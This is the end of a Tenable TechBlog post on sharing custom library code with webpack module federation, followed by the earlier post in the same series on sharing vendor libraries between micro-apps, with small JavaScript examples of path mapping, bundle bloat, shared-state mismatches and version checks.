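```javascript
// Hypothetical helper: produces one tsconfig "paths" entry per component so
// each component can be imported (and shared) on its own.
function granularPaths(libAlias, libSrcDir, componentNames) {
  const paths = {};
  for (const component of componentNames) {
    paths[`${libAlias}/${component}`] = [`${libSrcDir}/${component}.tsx`];
  }
  return paths;
}

const paths = granularPaths(
  "@microfrontend-demo/design-system/components",
  "libs/design-system/components/src/lib",
  ["test-component-one", "test-component-two"]
);
console.log(JSON.stringify(paths, null, 2));
```

Each generated key is an import specifier a micro-app could use directly, instead of importing everything through the library's index file.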

We can now import each one of these individual components:

If we investigate our network traffic, we can see that each one of those imports gets broken out into its own individual file:

This approach has several pros and cons that we discovered along the way:

Pros

  • Less Code To Pull Down — By making each individual component a direct import and by listing the component in the shared array of the ModuleFederationPlugin, we ensure that the micro-apps share as much library code as possible.
  • Only The Code That Is Needed Is Used — If a micro-app only needs to use one or two of the components in a library, they aren’t penalized by having to import a large bundle containing more than they need.

Cons

  • Performance — Bundling, the process of taking a number of separate files and consolidating them into one larger file, is a really good thing. If you continue down the granular path for everything in your libraries, you may very well find yourself in a scenario where you are importing hundreds of files in the browser. When it comes to browser performance and caching, there’s a balance to loading a lot of small granular files versus a few larger ones that have been bundled.

We recommend you choose the solution that works best based on your codebase. For some applications, going granular is an ideal solution and leads to the best performance in your application. However, for another application this could be a very bad decision, and your customers could end up having to pull down a ton of granular files when it would have made more sense to only have them pull down one larger file. So as we did, you’ll want to do your own performance analysis and use that as the basis for your approach.

Pitfalls

When it came to the code in our libs directory, we discovered two important things along the way that you should be aware of.

Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable-io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from subdirectories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and share each one via module federation.

To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).

We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more JavaScript than necessary.

We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.
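The effect of these three import levels can be approximated with a toy model. The module names, sizes, and entry points below are hypothetical, and the model simply assumes each shared entry point produces a bundle containing every module it exposes, as described above.

```javascript
// Hypothetical module sizes in kilobytes for a small common directory.
const moduleSizes = {
  "components/component1.js": 40,
  "components/component2.js": 60,
  "utilities/format.js": 20,
};

// Each shared entry point and the modules its bundle ends up containing.
const sharedEntries = {
  // Main index: everything in the directory.
  "tenable-io/common": Object.keys(moduleSizes),
  // Subdirectory index: everything under components.
  "tenable-io/common/components": ["components/component1.js", "components/component2.js"],
  // A single specific file.
  "tenable-io/common/components/component1": ["components/component1.js"],
};

function sumSizes(modules) {
  return modules.reduce((total, name) => total + moduleSizes[name], 0);
}

// Compares what is shipped across all bundles with what is actually unique.
function measureBloat(entries) {
  const allModules = Object.values(entries).flat();
  const shipped = sumSizes(allModules);
  const unique = sumSizes([...new Set(allModules)]);
  return { shipped, unique, duplicated: shipped - unique };
}

console.log(measureBloat(sharedEntries));
```

In this model, component1.js is shipped three times and component2.js twice, so more than half of the downloaded code is duplicated.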

As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.

Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps, and the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. That’s okay because the code is constrained to an actual file: App A and App B each use the version within their own bundle. As a result, they can both operate independently without bugs.

However, when it comes to things like state (Redux for us), storage (window.localStorage, document.cookie, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.
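The notices versus notifications mismatch can be reproduced in a few lines. This is a toy stand-in: `sharedState` is a plain object rather than a Redux store, and `appA` and `appB` are hypothetical micro-apps running different versions of the shared code.

```javascript
// One in-memory store shared by every micro-app on the page.
const sharedState = {};

// App A still runs the old shared code: notifications live under `notices`.
const appA = {
  addNotification(message) {
    sharedState.notices = sharedState.notices || [];
    sharedState.notices.push(message);
  },
};

// App B was deployed with the new shared code: it reads `notifications`.
const appB = {
  listNotifications() {
    return sharedState.notifications || [];
  },
};

appA.addNotification("Scan finished");
// App B looks under the new key and never sees what App A stored.
console.log(appB.listNotifications());
console.log(sharedState);
```

Neither app throws an error, which is part of what makes this class of bug hard to track down: the data is present in memory, just not where the other app expects it.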

As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, storage, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.

Summary

At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.


7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

6. Module Federation — Sharing Vendor Code

16 December 2021 at 17:16

This is post 6 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article focuses on the importance of sharing vendor library code between applications and some related best practices.

The Problem

One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.

Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more JavaScript than they should be.

The Solution

This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.
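The check described above can be modeled roughly as follows. This is a toy model, not webpack's actual resolution algorithm: `resolveShared`, `satisfiesCaret`, and the library names are hypothetical, and the version check only handles simple caret ranges such as `^2.1.0`.

```javascript
// Parses "1.2.3" into [1, 2, 3].
function parseVersion(version) {
  return version.split(".").map(Number);
}

// Simplified caret check: "^2.1.0" accepts any 2.x.y that is >= 2.1.0.
// Real semver ranges have more cases (0.x majors, prereleases, other operators).
function satisfiesCaret(version, range) {
  const [major, minor, patch] = parseVersion(version);
  const [rMajor, rMinor, rPatch] = parseVersion(range.replace(/^\^/, ""));
  if (major !== rMajor) return false;
  if (minor !== rMinor) return minor > rMinor;
  return patch >= rPatch;
}

// Returns "reuse" when an already loaded copy is compatible with what the
// micro-app requires, otherwise "load-own".
function resolveShared(loaded, name, requiredRange) {
  const loadedVersion = loaded[name];
  const compatible =
    loadedVersion !== undefined && satisfiesCaret(loadedVersion, requiredRange);
  return compatible ? "reuse" : "load-own";
}

// Libraries App A has already loaded (hypothetical names and versions).
const loadedByAppA = { "vendor-lib-1": "2.3.1" };

console.log(resolveShared(loadedByAppA, "vendor-lib-1", "^2.1.0"));
console.log(resolveShared(loadedByAppA, "vendor-lib-1", "^3.0.0"));
console.log(resolveShared(loadedByAppA, "vendor-lib-6", "^1.0.0"));
```

The three calls correspond to the three cases in the text: a compatible copy is already loaded, an incompatible copy is loaded, and no copy is loaded at all.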

Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:

If we print out the value of that variable, we’ll see the following:

This tells module federation that the three libraries should be shared, and more specifically that they are singletons. This means it could actually break our application if a micro-app attempted to load its own version. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.
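As a sketch of what such a value could look like, the snippet below builds a `shared` object from a `dependencies` map. The `buildNpmSharedLibs` helper, the library list, and the version ranges are assumptions for illustration. The sketch uses the `requiredVersion` option, which accepts the semver ranges found in package.json; whether the original configuration used `version`, `requiredVersion`, or both is not shown in the text.

```javascript
// Hypothetical excerpt of the dependencies section of package.json.
const dependencies = {
  react: "^17.0.2",
  "react-dom": "^17.0.2",
  "styled-components": "^5.3.0",
};

// Builds the object passed to the `shared` option: each library is marked as
// a singleton and takes its version range from package.json.
function buildNpmSharedLibs(deps, names) {
  const shared = {};
  for (const name of names) {
    shared[name] = { singleton: true, requiredVersion: deps[name] };
  }
  return shared;
}

const npmSharedLibs = buildNpmSharedLibs(dependencies, [
  "react",
  "react-dom",
  "styled-components",
]);
console.log(npmSharedLibs);
```

Because the ranges are read from the dependencies map, bumping a library in package.json changes the shared configuration without any further edits.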

If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:

Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.

We will now add this library to the shared property:
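A minimal sketch of such a change, assuming the shared configuration is a plain object keyed by package name. The existing entry and both version ranges are illustrative, not taken from the original repository.

```javascript
// Hypothetical existing value of the shared configuration.
const existingShared = {
  react: { singleton: true, requiredVersion: "^17.0.2" },
};

// Adding a library means adding one more key. No singleton flag is set here,
// since the article notes that most libraries do not need it.
const shared = {
  ...existingShared,
  "@styled-system/theme-get": { requiredVersion: "^5.1.2" },
};

console.log(Object.keys(shared));
```

The resulting object is what would be handed to the `shared` property of the ModuleFederationPlugin in each micro-app's webpack config.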

If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.

This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.

Summary

Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they access a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent and capable of sharing code between themselves when appropriate. This is the best of both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.


6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
